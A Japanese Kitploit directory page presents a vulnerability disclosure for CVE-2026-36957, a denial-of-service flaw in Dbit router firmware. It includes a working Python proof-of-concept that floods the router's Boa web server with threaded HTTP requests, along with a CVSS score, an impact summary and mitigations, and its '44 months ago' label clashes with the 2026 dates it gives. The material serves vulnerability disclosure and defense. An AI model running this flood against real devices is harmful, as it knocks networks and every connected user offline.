Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-36957 — CVE-2026-36957の概念実証。Dbitルーターのファームウェアにおけるサービス拒否(DoS)の脆弱性で、Boa WebサーバーへのHTTPフラッドによりリソース枯渇とシステムハングを引き起こします。 | Kitploit
ツール/GitHubGitHub/kirubel-cve/cve-2026-36957
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

CVE-2026-36957の概念実証。Dbitルーターのファームウェアにおけるサービス拒否(DoS)の脆弱性で、Boa WebサーバーへのHTTPフラッドによりリソース枯渇とシステムハングを引き起こします。

リポジトリを見る
44ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-36957: Boa WebサーバーへのHTTPフラッドによるサービス拒否

CVE ID: CVE-2026-36957 日付: 2026-04-29 発見者: Kirubel Solomne ベンダー: 深センDibit網絡設備有限公司 (Shenzhen Dibit Network Equipment Co., Ltd.) 製品: Dbit Router ファームウェアバージョン: V1.0.0 CWE: CWE-400 - 制御されないリソース消費


説明

Dbit RouterファームウェアV1.0.0は、Boa WebサーバーのURIハンドラーを介したサービス拒否に対して脆弱です。存在しないURIに対して大量のHTTP GETリクエストを送信することで、攻撃者はファイルディスクリプタやメモリバッファを含む重要なシステムリソースを枯渇させることができます。これにより、カーネルのデッドロックやシステムのハングアップが発生し、Web管理ポータルとすべてのルーティング機能が無効になります。


CVSSスコア

CVSS v3.1スコア: 7.5 (高) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

メトリック値
攻撃元区分ネットワーク
攻撃条件の複雑さ低
必要な特権レベル不要
ユーザー操作不要
機密性への影響なし
完全性への影響なし
可用性への影響高

概念実証

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

期待される動作: サーバーは接続を制限し、安定した状態を維持する必要があります。 実際の動作: ルーターのWebインターフェースが応答しなくなり、手動での再起動が必要になります。


影響

  • Web管理インターフェースの完全な喪失
  • すべてのルーティング機能の停止
  • サービス復旧には手動での再起動が必要
  • 接続されているすべてのデバイスでネットワークダウンタイムが発生

対策

  • Boa Webサーバーに接続レート制限を実装する
  • デッドロック状態から回復するためのウォッチドッグタイマーを追加する
  • IPごとの最大同時接続数を制限する

開示スケジュール

日付イベント
2026-04-29脆弱性を発見
2026-04-29MITREに報告
2026-04-29CVE-2026-36957が割り当てられる
2026-04-29公開開示

参考情報

  • MITRE CVE-2026-36957
  • CWE-400
  • ベンダーウェブサイト
ツールをダウンロード